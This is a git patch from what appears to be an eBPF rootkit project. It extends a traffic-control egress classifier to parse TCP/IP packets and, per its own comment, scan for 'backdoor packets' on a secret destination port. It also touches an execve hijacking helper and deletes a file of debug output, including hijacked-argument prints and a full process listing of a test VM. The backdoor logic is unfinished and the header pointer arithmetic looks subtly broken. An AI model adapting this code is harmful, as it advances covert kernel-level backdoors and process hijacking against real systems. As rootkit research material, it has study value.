From c3bffb6f843ab15a56efa3a9a783ed058c71cb34 Mon Sep 17 00:00:00 2001
From: h3xduck <marcossanchezbajo@gmail.com>
Date: Wed, 13 Apr 2022 16:56:17 -0400
Subject: [PATCH] Completed packet parsing at tc hook

---
 src/ebpf/include/bpf/tc.c   |  62 +++---
 src/helpers/bash            |   0
 src/helpers/echo            | 406 ------------------------------------
 src/helpers/execve_hijack   | Bin 42016 -> 42016 bytes
 src/helpers/execve_hijack.c |  15 +-
 src/helpers/execve_hijack.o | Bin 9064 -> 9224 bytes
 src/tc.o                    | Bin 1016 -> 1120 bytes
 7 files changed, 45 insertions(+), 438 deletions(-)
 delete mode 100644 src/helpers/bash
 delete mode 100644 src/helpers/echo

diff --git a/src/ebpf/include/bpf/tc.c b/src/ebpf/include/bpf/tc.c
index 25ff7fa..ece886f 100644
--- a/src/ebpf/include/bpf/tc.c
+++ b/src/ebpf/include/bpf/tc.c
@@ -1,39 +1,49 @@
 #include <linux/bpf.h>
-#include <linux/if_ether.h>
 #include <linux/pkt_cls.h>
+#include <linux/if_ether.h>
+#include <linux/ip.h>
+#include <linux/tcp.h>
+#include <arpa/inet.h>
 #include <linux/swab.h>
 #include <bpf/bpf_tracing.h>
 #include <bpf/bpf_helpers.h>
 
-
-struct pkt_ctx_t {
-    struct cursor *c;
-    struct ethhdr *eth;
-    struct iphdr *ipv4;
-    struct tcphdr *tcp;
-    struct udphdr *udp;
-    struct http_req_t *http_req;
-};
+#include "../../../common/constants.h"
 
 SEC("classifier/egress")
 int classifier(struct __sk_buff *skb){
-	void *data_end = (void *)(unsigned long long)skb->data_end;
-	void *data = (void *)(unsigned long long)skb->data;
-	struct ethhdr *eth = data;
-    bpf_printk("Heey\n");
-	if (data + sizeof(struct ethhdr) > data_end)
-		return TC_ACT_SHOT;
-
-	if (eth->h_proto == ___constant_swab16(ETH_P_IP))
-		/*
-		 * Packet processing is not implemented in this sample. Parse
-		 * IPv4 header, possibly push/pop encapsulation headers, update
-		 * header fields, drop or transmit based on network policy,
-		 * collect statistics and store them in a eBPF map...
-		 */
-		return 0;//process_packet(skb);
-	else
+	void *data = (void *)(__u64)skb->data;
+	void *data_end = (void *)(__u64)skb->data_end;
+    bpf_printk("TC egress classifier called\n");
+	
+	//We are interested on parsing TCP/IP packets so let's assume we have one
+	//Ethernet header
+	struct ethhdr *eth_hdr = data;
+	if(eth_hdr->h_proto != htons(ETH_P_IP)){
+		//Not an IP packet
 		return TC_ACT_OK;
+	}
+
+	//IP header
+	struct iphdr *ip_hdr = (struct iphdr*)data + sizeof(struct ethhdr);
+	if(ip_hdr->protocol != IPPROTO_TCP){
+		return TC_ACT_OK;
+	}
+
+	//TCP header
+	struct tcphdr *tcp_hdr = (struct tcphdr *)data + sizeof(struct ethhdr) + sizeof(struct iphdr);
+
+	//We now proceed to scan for our backdoor packets
+
+	__u16 dest_port = ntohs(tcp_hdr->dest);
+	if(dest_port != SECRET_PACKET_DEST_PORT){
+		return TC_ACT_OK;
+	}
+
+
+
+	return TC_ACT_OK;
+	
 }
 
 char _license[4] SEC("license") = "GPL";
\ No newline at end of file
diff --git a/src/helpers/bash b/src/helpers/bash
deleted file mode 100644
index e69de29..0000000
diff --git a/src/helpers/echo b/src/helpers/echo
deleted file mode 100644
index 38e17c9..0000000
--- a/src/helpers/echo
+++ /dev/null
@@ -1,406 +0,0 @@
-exec -a ./execve_hijack /usr/bin/ls -l -a
-exec -a ./execve_hijack /usr/bin/ls -l -a
-total 84
-drwxrwxr-x  3 osboxes osboxes  4096 Apr 13 07:00 .
-drwxrwxr-x 12 osboxes osboxes  4096 Apr 13 06:24 ..
--rw-rw-r--  1 osboxes osboxes     0 Apr 13 06:59 bash
--rw-rw-r--  1 osboxes osboxes    84 Apr 13 06:59 echo
--rwxrwxr-x  1 osboxes osboxes 42016 Apr 13 06:58 execve_hijack
--rw-rw-r--  1 osboxes osboxes  5648 Apr 13 06:58 execve_hijack.c
--rw-rw-r--  1 osboxes osboxes  8872 Apr 13 06:58 execve_hijack.o
-drwxrwxr-x  2 osboxes osboxes  4096 Feb 18 03:11 lib
--rw-rw-r--  1 osboxes osboxes   329 Apr 11 05:54 Makefile
-Hello world from execve hijacker
-Argument 0 is ./execve_hijack
-Argument 1 is ,
-hijacking ARGS0: ,
-hijacking ARGS1: ,
-hijacking ARGS2: (null)
-Hello world from execve hijacker
-Argument 0 is ./execve_hijack
-Argument 1 is -l
-Argument 2 is -a
-hijacking ARGS0: -l
-hijacking ARGS1: -l
-hijacking ARGS2: -a
-hijacking ARGS3: (null)
-    PID TTY          TIME CMD
- 250918 pts/8    00:00:00 bash
- 251961 pts/8    00:00:00 bash
- 252541 pts/8    00:00:00 ps
-USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
-root           1  0.0  0.1 166252  7748 ?        Ss   Apr10   0:10 /sbin/init splash
-root           2  0.0  0.0      0     0 ?        S    Apr10   0:00 [kthreadd]
-root           3  0.0  0.0      0     0 ?        I<   Apr10   0:00 [rcu_gp]
-root           4  0.0  0.0      0     0 ?        I<   Apr10   0:00 [rcu_par_gp]
-root           6  0.0  0.0      0     0 ?        I<   Apr10   0:00 [kworker/0:0H-events_highpri]
-root           9  0.0  0.0      0     0 ?        I<   Apr10   0:00 [mm_percpu_wq]
-root          10  0.0  0.0      0     0 ?        S    Apr10   0:00 [rcu_tasks_rude_]
-root          11  0.0  0.0      0     0 ?        S    Apr10   0:00 [rcu_tasks_trace]
-root          12  0.0  0.0      0     0 ?        S    Apr10   0:01 [ksoftirqd/0]
-root          13  0.0  0.0      0     0 ?        I    Apr10   1:59 [rcu_sched]
-root          14  0.0  0.0      0     0 ?        S    Apr10   0:01 [migration/0]
-root          15  0.0  0.0      0     0 ?        S    Apr10   0:00 [idle_inject/0]
-root          16  0.0  0.0      0     0 ?        S    Apr10   0:00 [cpuhp/0]
-root          17  0.0  0.0      0     0 ?        S    Apr10   0:00 [cpuhp/1]
-root          18  0.0  0.0      0     0 ?        S    Apr10   0:00 [idle_inject/1]
-root          19  0.0  0.0      0     0 ?        S    Apr10   0:01 [migration/1]
-root          20  0.0  0.0      0     0 ?        S    Apr10   0:01 [ksoftirqd/1]
-root          22  0.0  0.0      0     0 ?        I<   Apr10   0:00 [kworker/1:0H-events_highpri]
-root          23  0.0  0.0      0     0 ?        S    Apr10   0:00 [cpuhp/2]
-root          24  0.0  0.0      0     0 ?        S    Apr10   0:00 [idle_inject/2]
-root          25  0.0  0.0      0     0 ?        S    Apr10   0:01 [migration/2]
-root          26  0.0  0.0      0     0 ?        S    Apr10   0:01 [ksoftirqd/2]
-root          28  0.0  0.0      0     0 ?        I<   Apr10   0:00 [kworker/2:0H-events_highpri]
-root          29  0.0  0.0      0     0 ?        S    Apr10   0:00 [cpuhp/3]
-root          30  0.0  0.0      0     0 ?        S    Apr10   0:00 [idle_inject/3]
-root          31  0.0  0.0      0     0 ?        S    Apr10   0:01 [migration/3]
-root          32  0.0  0.0      0     0 ?        S    Apr10   0:01 [ksoftirqd/3]
-root          34  0.0  0.0      0     0 ?        I<   Apr10   0:00 [kworker/3:0H-events_highpri]
-root          35  0.0  0.0      0     0 ?        S    Apr10   0:00 [kdevtmpfs]
-root          36  0.0  0.0      0     0 ?        I<   Apr10   0:00 [netns]
-root          37  0.0  0.0      0     0 ?        I<   Apr10   0:00 [inet_frag_wq]
-root          38  0.0  0.0      0     0 ?        S    Apr10   0:00 [kauditd]
-root          39  0.0  0.0      0     0 ?        S    Apr10   0:00 [khungtaskd]
-root          40  0.0  0.0      0     0 ?        S    Apr10   0:00 [oom_reaper]
-root          41  0.0  0.0      0     0 ?        I<   Apr10   0:00 [writeback]
-root          42  0.0  0.0      0     0 ?        S    Apr10   0:08 [kcompactd0]
-root          43  0.0  0.0      0     0 ?        SN   Apr10   0:00 [ksmd]
-root          44  0.0  0.0      0     0 ?        SN   Apr10   0:00 [khugepaged]
-root          90  0.0  0.0      0     0 ?        I<   Apr10   0:00 [kintegrityd]
-root          91  0.0  0.0      0     0 ?        I<   Apr10   0:00 [kblockd]
-root          92  0.0  0.0      0     0 ?        I<   Apr10   0:00 [blkcg_punt_bio]
-root          93  0.0  0.0      0     0 ?        I<   Apr10   0:00 [tpm_dev_wq]
-root          94  0.0  0.0      0     0 ?        I<   Apr10   0:00 [ata_sff]
-root          95  0.0  0.0      0     0 ?        I<   Apr10   0:00 [md]
-root          96  0.0  0.0      0     0 ?        I<   Apr10   0:00 [edac-poller]
-root          97  0.0  0.0      0     0 ?        I<   Apr10   0:00 [devfreq_wq]
-root          99  0.0  0.0      0     0 ?        S    Apr10   0:00 [watchdogd]
-root         102  0.0  0.0      0     0 ?        I<   Apr10   0:04 [kworker/1:1H-kblockd]
-root         104  0.0  0.0      0     0 ?        S    Apr10   0:34 [kswapd0]
-root         105  0.0  0.0      0     0 ?        S    Apr10   0:00 [ecryptfs-kthrea]
-root         107  0.0  0.0      0     0 ?        I<   Apr10   0:00 [kthrotld]
-root         108  0.0  0.0      0     0 ?        I<   Apr10   0:00 [acpi_thermal_pm]
-root         109  0.0  0.0      0     0 ?        S    Apr10   0:00 [scsi_eh_0]
-root         110  0.0  0.0      0     0 ?        I<   Apr10   0:00 [scsi_tmf_0]
-root         111  0.0  0.0      0     0 ?        S    Apr10   0:00 [scsi_eh_1]
-root         112  0.0  0.0      0     0 ?        I<   Apr10   0:00 [scsi_tmf_1]
-root         114  0.0  0.0      0     0 ?        I<   Apr10   0:00 [vfio-irqfd-clea]
-root         116  0.0  0.0      0     0 ?        I<   Apr10   0:00 [ipv6_addrconf]
-root         117  0.0  0.0      0     0 ?        I<   Apr10   0:03 [kworker/0:1H-kblockd]
-root         126  0.0  0.0      0     0 ?        I<   Apr10   0:00 [kstrp]
-root         129  0.0  0.0      0     0 ?        I<   Apr10   0:00 [zswap-shrink]
-root         130  0.0  0.0      0     0 ?        I<   Apr10   0:00 [kworker/u9:0]
-root         135  0.0  0.0      0     0 ?        I<   Apr10   0:00 [charger_manager]
-root         185  0.0  0.0      0     0 ?        I<   Apr10   0:05 [kworker/3:1H-kblockd]
-root         187  0.0  0.0      0     0 ?        S    Apr10   0:00 [scsi_eh_2]
-root         188  0.0  0.0      0     0 ?        I<   Apr10   0:00 [scsi_tmf_2]
-root         190  0.0  0.0      0     0 ?        I<   Apr10   0:10 [kworker/2:1H-kblockd]
-root         222  0.0  0.0      0     0 ?        S    Apr10   0:03 [jbd2/sda1-8]
-root         223  0.0  0.0      0     0 ?        I<   Apr10   0:00 [ext4-rsv-conver]
-root         293  0.0  0.0  23716  2576 ?        Ss   Apr10   0:00 /lib/systemd/systemd-udevd
-root         294  0.0  0.0      0     0 ?        S    Apr10   0:22 [irq/18-vmwgfx]
-root         295  0.0  0.0      0     0 ?        I<   Apr10   0:00 [ttm_swap]
-root         296  0.0  0.0      0     0 ?        S    Apr10   0:00 [card0-crtc0]
-root         297  0.0  0.0      0     0 ?        S    Apr10   0:00 [card0-crtc1]
-root         298  0.0  0.0      0     0 ?        S    Apr10   0:00 [card0-crtc2]
-root         299  0.0  0.0      0     0 ?        S    Apr10   0:00 [card0-crtc3]
-root         300  0.0  0.0      0     0 ?        S    Apr10   0:00 [card0-crtc4]
-root         301  0.0  0.0      0     0 ?        S    Apr10   0:00 [card0-crtc5]
-root         302  0.0  0.0      0     0 ?        S    Apr10   0:00 [card0-crtc6]
-root         303  0.0  0.0      0     0 ?        S    Apr10   0:00 [card0-crtc7]
-root         309  0.0  0.0      0     0 ?        S<   Apr10   0:00 [loop0]
-root         323  0.0  0.0      0     0 ?        S<   Apr10   0:00 [loop1]
-root         341  0.0  0.0      0     0 ?        S<   Apr10   0:00 [loop2]
-root         342  0.0  0.0      0     0 ?        S<   Apr10   0:00 [loop3]
-root         353  0.0  0.0      0     0 ?        S<   Apr10   0:00 [loop4]
-root         354  0.0  0.0      0     0 ?        S<   Apr10   0:00 [loop5]
-root         355  0.0  0.0      0     0 ?        S<   Apr10   0:00 [loop6]
-root         361  0.0  0.0      0     0 ?        S<   Apr10   0:00 [loop7]
-root         363  0.0  0.0      0     0 ?        I<   Apr10   0:00 [iprt-VBoxWQueue]
-root         385  0.0  0.0      0     0 ?        S<   Apr10   0:00 [loop8]
-root         390  0.0  0.0      0     0 ?        I<   Apr10   0:00 [cryptd]
-root         477  0.0  0.0      0     0 ?        S<   Apr10   0:00 [loop9]
-root         558  0.0  0.0      0     0 ?        S<   Apr10   0:00 [loop10]
-root         587  0.0  0.0      0     0 ?        S<   Apr10   0:00 [loop11]
-root         588  0.0  0.0      0     0 ?        S<   Apr10   0:00 [loop12]
-root         591  0.0  0.0      0     0 ?        S<   Apr10   0:00 [loop14]
-root         593  0.0  0.0      0     0 ?        S    Apr10   0:08 [jbd2/sda4-8]
-root         594  0.0  0.0      0     0 ?        I<   Apr10   0:00 [ext4-rsv-conver]
-systemd+     616  0.0  0.0  24760  3936 ?        Ss   Apr10   0:09 /lib/systemd/systemd-resolved
-systemd+     617  0.0  0.0  88452  2308 ?        Ssl  Apr10   0:00 /lib/systemd/systemd-timesyncd
-root         644  0.0  0.0 249148  3568 ?        Ssl  Apr10   0:05 /usr/lib/accountsservice/accounts-daemon
-root         645  0.0  0.0   2556   640 ?        Ss   Apr10   0:09 /usr/sbin/acpid
-avahi        648  0.0  0.0   7388  1876 ?        Ss   Apr10   0:00 avahi-daemon: running [osboxes.local]
-root         649  0.0  0.0  18128  1820 ?        Ss   Apr10   0:01 /usr/sbin/cron -f -P
-message+     650  0.0  0.0  10940  4328 ?        Ss   Apr10   0:31 @dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
-root         652  0.0  0.1 493716  7728 ?        Ssl  Apr10   0:40 /usr/sbin/NetworkManager --no-daemon
-root         659  0.0  0.0  82848  2464 ?        Ssl  Apr10   0:07 /usr/sbin/irqbalance --foreground
-root         663  0.0  0.0  48180  3148 ?        Ss   Apr10   0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
-root         664  0.0  0.1 251896  7664 ?        Ssl  Apr10   0:06 /usr/libexec/polkitd --no-debug
-root         680  0.0  0.0 245860  3420 ?        Ssl  Apr10   0:00 /usr/libexec/power-profiles-daemon
-syslog       685  0.0  0.0 221216  2216 ?        Ssl  Apr10   0:03 /usr/sbin/rsyslogd -n -iNONE
-root         688  0.0  0.0 245672  3180 ?        Ssl  Apr10   0:00 /usr/libexec/switcheroo-control
-root         689  0.0  0.0  22140  4056 ?        Ss   Apr10   0:01 /lib/systemd/systemd-logind
-root         690  0.0  0.0 394264  5620 ?        Ssl  Apr10   0:00 /usr/libexec/udisks2/udisksd
-root         692  0.0  0.0  14740  1176 ?        Ss   Apr10   0:01 /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant
-avahi        697  0.0  0.0   7252   136 ?        S    Apr10   0:00 avahi-daemon: chroot helper
-root         745  0.0  0.0 316740  3448 ?        Ssl  Apr10   0:00 /usr/sbin/ModemManager
-root         800  0.0  0.0 126288  3336 ?        Ssl  Apr10   0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
-whoopsie     826  0.0  0.0 328480  5412 ?        Ssl  Apr10   0:00 /usr/bin/whoopsie -f
-kernoops     827  0.0  0.0  13528   112 ?        Ss   Apr10   0:00 /usr/sbin/kerneloops --test
-kernoops     829  0.0  0.0  13528   136 ?        Ss   Apr10   0:00 /usr/sbin/kerneloops
-root        1017  0.0  0.0 370556  1584 ?        Sl   Apr10   0:32 /usr/sbin/VBoxService --pidfile /var/run/vboxadd-service.sh
-root        1028  0.0  0.0 250400  3648 ?        Ssl  Apr10   0:00 /usr/sbin/gdm3
-rtkit       1057  0.0  0.0 153848  1856 ?        SNsl Apr10   0:03 /usr/libexec/rtkit-daemon
-root        1138  0.0  0.0 258424  3556 ?        Ssl  Apr10   0:02 /usr/libexec/upowerd
-root        1227  0.0  0.0 307228  4772 ?        Ssl  Apr10   0:01 /usr/libexec/packagekitd
-colord      1364  0.0  0.0 254356  5076 ?        Ssl  Apr10   0:00 /usr/libexec/colord
-root        1429  0.0  0.0 180024  4740 ?        Sl   Apr10   0:00 gdm-session-worker [pam/gdm-password]
-osboxes     1434  0.0  0.0  16300  5664 ?        Ss   Apr10   0:02 /lib/systemd/systemd --user
-osboxes     1435  0.0  0.0 102744   312 ?        S    Apr10   0:00 (sd-pam)
-osboxes     1441  0.0  0.0  90680  1908 ?        S<sl Apr10   0:00 /usr/bin/pipewire
-osboxes     1442  0.0  0.0  82828  1628 ?        S<sl Apr10   0:01 /usr/bin/pipewire-media-session
-osboxes     1443  0.5  0.1 2990832 7244 ?        S<sl Apr10  20:06 /usr/bin/pulseaudio --daemonize=no --log-target=journal
-osboxes     1445  0.0  1.6 612568 102728 ?       SNsl Apr10   0:01 /usr/libexec/tracker-miner-fs
-osboxes     1447  0.0  0.0   9924  4068 ?        Ss   Apr10   0:11 /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
-osboxes     1453  0.0  0.0 250260  2068 ?        Sl   Apr10   0:02 /usr/bin/gnome-keyring-daemon --daemonize --login
-osboxes     1470  0.0  0.0 249856  4680 ?        Ssl  Apr10   0:00 /usr/libexec/gvfsd
-osboxes     1475  0.0  0.0 379672  3128 ?        Sl   Apr10   0:00 /usr/libexec/gvfsd-fuse /run/user/1000/gvfs -f -o big_writes
-osboxes     1483  0.0  0.0 171648  3172 tty2     Ssl+ Apr10   0:00 /usr/libexec/gdm-wayland-session env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --session=ubuntu
-osboxes     1486  0.0  0.0 229960  3156 tty2     Sl+  Apr10   0:00 /usr/libexec/gnome-session-binary --systemd --session=ubuntu
-osboxes     1495  0.0  0.0 398960  5016 ?        Ssl  Apr10   0:00 /usr/libexec/gvfs-udisks2-volume-monitor
-osboxes     1518  0.0  0.0 245656  3732 ?        Ssl  Apr10   0:00 /usr/libexec/gvfs-mtp-volume-monitor
-osboxes     1522  0.0  0.0 246580  3644 ?        Ssl  Apr10   0:00 /usr/libexec/gvfs-gphoto2-volume-monitor
-osboxes     1533  0.0  0.0 245844  3212 ?        Ssl  Apr10   0:00 /usr/libexec/gvfs-goa-volume-monitor
-osboxes     1537  0.0  0.0 566264  4876 ?        Sl   Apr10   0:00 /usr/libexec/goa-daemon
-osboxes     1546  0.0  0.0 324784  3452 ?        Sl   Apr10   0:11 /usr/libexec/goa-identity-service
-osboxes     1555  0.0  0.0 100968  1788 ?        Ssl  Apr10   0:00 /usr/libexec/gnome-session-ctl --monitor
-osboxes     1557  0.0  0.0 322988  3420 ?        Ssl  Apr10   0:09 /usr/libexec/gvfs-afc-volume-monitor
-osboxes     1569  0.0  0.0 525924  4760 ?        Ssl  Apr10   0:00 /usr/libexec/gnome-session-binary --systemd-service --session=ubuntu
-osboxes     1594  0.0  0.0 306768  3544 ?        Sl   Apr10   0:00 /usr/libexec/at-spi-bus-launcher --launch-immediately
-osboxes     1595  4.9  7.3 5662940 454968 ?      Rsl  Apr10 188:49 /usr/bin/gnome-shell
-osboxes     1603  0.0  0.0   8252  2536 ?        S    Apr10   0:00 /usr/bin/dbus-daemon --config-file=/usr/share/defaults/at-spi2/accessibility.conf --nofork --print-address 3
-osboxes     1628  0.3  0.8 1105772 52096 ?       Sl   Apr10  11:29 /usr/bin/Xwayland :0 -rootless -noreset -accessx -core -auth /run/user/1000/.mutter-Xwaylandauth.C1H2J1 -listen 4 -listen 5 -displayfd 6 -initfd 7
-osboxes     1650  0.0  0.0 245576  2316 ?        Ssl  Apr10   0:00 /usr/libexec/xdg-permission-store
-osboxes     1652  0.0  0.0 581744  4064 ?        Sl   Apr10   0:00 /usr/libexec/gnome-shell-calendar-server
-osboxes     1661  0.0  0.0 1078824 4280 ?        Ssl  Apr10   0:00 /usr/libexec/evolution-source-registry
-osboxes     1668  0.0  0.0 846772  5260 ?        Ssl  Apr10   0:00 /usr/libexec/evolution-calendar-factory
-osboxes     1670  0.0  0.0 157528  3228 ?        Sl   Apr10   0:00 /usr/libexec/dconf-service
-osboxes     1683  0.0  0.0 756140  5152 ?        Ssl  Apr10   0:00 /usr/libexec/evolution-addressbook-factory
-osboxes     1698  0.0  0.1 2677972 7300 ?        Sl   Apr10   0:00 /usr/bin/gjs /usr/share/gnome-shell/org.gnome.Shell.Notifications
-osboxes     1700  0.0  0.0 163116  3260 ?        Sl   Apr10   0:00 /usr/libexec/at-spi2-registryd --use-gnome-session
-osboxes     1712  0.0  0.0 323992  4332 ?        Sl   Apr10   0:00 /usr/libexec/gvfsd-trash --spawner :1.3 /org/gtk/gvfs/exec_spaw/0
-osboxes     1720  0.0  0.0 319664  3312 ?        Ssl  Apr10   0:00 /usr/libexec/gsd-a11y-settings
-osboxes     1721  0.0  0.0 456776  5988 ?        Ssl  Apr10   0:00 /usr/libexec/gsd-color
-osboxes     1722  0.0  0.0 382084  3912 ?        Ssl  Apr10   0:00 /usr/libexec/gsd-datetime
-osboxes     1723  0.0  0.0 320544  4152 ?        Ssl  Apr10   0:07 /usr/libexec/gsd-housekeeping
-osboxes     1726  0.0  0.0 348136  4156 ?        Ssl  Apr10   0:00 /usr/libexec/gsd-keyboard
-osboxes     1728  0.0  0.1 1136256 7056 ?        Ssl  Apr10   0:00 /usr/libexec/gsd-media-keys
-osboxes     1729  0.0  0.1 651356  8148 ?        Ssl  Apr10   0:00 /usr/libexec/gsd-power
-osboxes     1730  0.0  0.0 258136  4464 ?        Ssl  Apr10   0:00 /usr/libexec/gsd-print-notifications
-osboxes     1736  0.0  0.0 393364  3628 ?        Ssl  Apr10   0:00 /usr/libexec/gsd-rfkill
-osboxes     1737  0.0  0.0 245644  3120 ?        Ssl  Apr10   0:00 /usr/libexec/gsd-screensaver-proxy
-osboxes     1738  0.0  0.0 475028  3376 ?        Ssl  Apr10   0:00 /usr/libexec/gsd-sharing
-osboxes     1739  0.0  0.0 395296  3300 ?        Ssl  Apr10   0:00 /usr/libexec/gsd-smartcard
-osboxes     1741  0.0  0.0 331124  3804 ?        Ssl  Apr10   0:00 /usr/libexec/gsd-sound
-osboxes     1743  0.0  0.0 347804  4180 ?        Ssl  Apr10   0:00 /usr/libexec/gsd-wacom
-osboxes     1795  0.0  0.1 658536  6292 ?        Sl   Apr10   0:00 /usr/libexec/evolution-data-server/evolution-alarm-notify
-osboxes     1804  0.0  0.0 350280  4204 ?        Sl   Apr10   0:00 /usr/libexec/gsd-printer
-osboxes     1835  0.0  0.0 232044  3308 ?        Sl   Apr10   0:00 /usr/libexec/gsd-disk-utility-notify
-osboxes     1872  0.0  0.0  29288    24 ?        S    Apr10   0:00 /usr/bin/VBoxClient --clipboard
-osboxes     1873  0.0  0.0 161556   188 ?        Sl   Apr10   0:00 /usr/bin/VBoxClient --clipboard
-osboxes     1895  0.0  0.0  29288    20 ?        S    Apr10   0:00 /usr/bin/VBoxClient --seamless
-osboxes     1896  0.0  0.0 161524   360 ?        Sl   Apr10   0:47 /usr/bin/VBoxClient --seamless
-osboxes     1900  0.0  0.0  29288     8 ?        S    Apr10   0:00 /usr/bin/VBoxClient --draganddrop
-osboxes     1901  0.1  0.0 162040   488 ?        Sl   Apr10   6:49 /usr/bin/VBoxClient --draganddrop
-osboxes     1907  0.0  0.0  29288     4 ?        S    Apr10   0:00 /usr/bin/VBoxClient --vmsvga
-root        1908  0.0  0.0  86112  1220 ?        S    Apr10   0:00 [VBoxDRMClient]
-osboxes     1957  0.0  0.0 397616  5684 ?        Sl   Apr10   1:12 ibus-daemon --panel disable -r --xim
-osboxes     1958  0.0  0.1 1358348 7224 ?        Ssl  Apr10   0:03 /usr/libexec/gsd-xsettings
-osboxes     1984  0.0  0.0 172696  3384 ?        Sl   Apr10   0:00 /usr/libexec/ibus-memconf
-osboxes     1991  0.0  0.0 353268  5968 ?        Sl   Apr10   0:10 /usr/libexec/ibus-extension-gtk3
-osboxes     2002  0.0  0.0 201612  5380 ?        Sl   Apr10   0:02 /usr/libexec/ibus-x11 --kill-daemon
-osboxes     2005  0.0  0.0 247948  3884 ?        Sl   Apr10   0:02 /usr/libexec/ibus-portal
-osboxes     2030  0.0  0.0 172816  4312 ?        Sl   Apr10   0:24 /usr/libexec/ibus-engine-simple
-osboxes     2048  0.0  0.0 172300  3416 ?        Ssl  Apr10   0:00 /usr/libexec/gvfsd-metadata
-osboxes     2072  0.9  9.2 4505748 571124 ?      Sl   Apr10  34:38 /usr/lib/firefox/firefox -new-window
-osboxes     2131  0.0  0.1 194420  8620 ?        Sl   Apr10   2:01 /usr/lib/firefox/firefox -contentproc -parentBuildID 20220106144528 -prefsLen 1 -prefMapSize 246643 -appDir /usr/lib/firefox/browser 2072 true socket
-osboxes     2164  0.0  1.1 2469704 70276 ?       Sl   Apr10   0:26 /usr/lib/firefox/firefox -contentproc -childID 1 -isForBrowser -prefsLen 139 -prefMapSize 246643 -jsInitLen 279340 -parentBuildID 20220106144528 -appDir /usr/lib/firefox/browser 2072 true tab
-osboxes     2237  0.0  1.1 2564588 73900 ?       Sl   Apr10   3:18 /usr/lib/firefox/firefox -contentproc -childID 3 -isForBrowser -prefsLen 4973 -prefMapSize 246643 -jsInitLen 279340 -parentBuildID 20220106144528 -appDir /usr/lib/firefox/browser 2072 true tab
-osboxes     2303  0.0  2.0 2612376 125328 ?      Sl   Apr10   0:31 /usr/lib/firefox/firefox -contentproc -childID 6 -isForBrowser -prefsLen 5672 -prefMapSize 246643 -jsInitLen 279340 -parentBuildID 20220106144528 -appDir /usr/lib/firefox/browser 2072 true tab
-osboxes     2369  1.0  5.9 3156188 370416 ?      Sl   Apr10  40:43 /usr/lib/firefox/firefox -contentproc -childID 7 -isForBrowser -prefsLen 8184 -prefMapSize 246643 -jsInitLen 279340 -parentBuildID 20220106144528 -appDir /usr/lib/firefox/browser 2072 true tab
-osboxes     2387  0.3  1.5 38653584 93760 ?      SLl  Apr10  11:32 /usr/share/code/code --unity-launch
-osboxes     2391  0.0  0.1 201092  6792 ?        S    Apr10   0:00 /usr/share/code/code --type=zygote --no-zygote-sandbox
-osboxes     2392  0.0  0.1 201092  6544 ?        S    Apr10   0:00 /usr/share/code/code --type=zygote
-osboxes     2394  0.0  0.0 201092  1572 ?        S    Apr10   0:00 /usr/share/code/code --type=zygote
-osboxes     2444  0.0  0.2 263876 17548 ?        Sl   Apr10   0:04 /usr/share/code/code --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=15541623923277986509,16096957837955962724,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --lang=en-GB --service-sandbox-type=none --enable-crash-reporter=92839825-0bbb-4be7-8b77-5add1429d30d,no_channel --global-crash-keys=92839825-0bbb-4be7-8b77-5add1429d30d,no_channel,_companyName=Microsoft,_productName=VSCode,_version=1.62.3 --user-data-dir=/home/osboxes/.config/Code --standard-schemes=vscode-webview,vscode-file --secure-schemes=vscode-webview,vscode-file --bypasscsp-schemes --cors-schemes=vscode-webview,vscode-file --fetch-schemes=vscode-webview,vscode-file --service-worker-schemes=vscode-webview --streaming-schemes --shared-files=v8_context_snapshot_data:100
-osboxes     2445  1.3  2.8 861540 173488 ?       Sl   Apr10  50:07 /usr/share/code/code --type=gpu-process --field-trial-handle=15541623923277986509,16096957837955962724,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --disable-color-correct-rendering --enable-crash-reporter=92839825-0bbb-4be7-8b77-5add1429d30d,no_channel --global-crash-keys=92839825-0bbb-4be7-8b77-5add1429d30d,no_channel,_companyName=Microsoft,_productName=VSCode,_version=1.62.3 --user-data-dir=/home/osboxes/.config/Code --gpu-preferences=UAAAAAAAAAAgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --shared-files
-osboxes     2454  0.0  0.0 217680   448 ?        S    Apr10   0:00 /usr/share/code/code --type=broker
-osboxes     2463  0.2  2.8 48748244 177996 ?     Sl   Apr10   8:04 /usr/share/code/code --type=renderer --disable-color-correct-rendering --field-trial-handle=15541623923277986509,16096957837955962724,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --disable-gpu-compositing --lang=en-GB --enable-crash-reporter=92839825-0bbb-4be7-8b77-5add1429d30d,no_channel --global-crash-keys=92839825-0bbb-4be7-8b77-5add1429d30d,no_channel,_companyName=Microsoft,_productName=VSCode,_version=1.62.3 --user-data-dir=/home/osboxes/.config/Code --standard-schemes=vscode-webview,vscode-file --secure-schemes=vscode-webview,vscode-file --bypasscsp-schemes --cors-schemes=vscode-webview,vscode-file --fetch-schemes=vscode-webview,vscode-file --service-worker-schemes=vscode-webview --streaming-schemes --app-path=/usr/share/code/resources/app --no-sandbox --no-zygote --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --shared-files=v8_context_snapshot_data:100 --vscode-window-config=vscode:2c96bdca-2f1a-4ed2-90d3-2edd2a939552
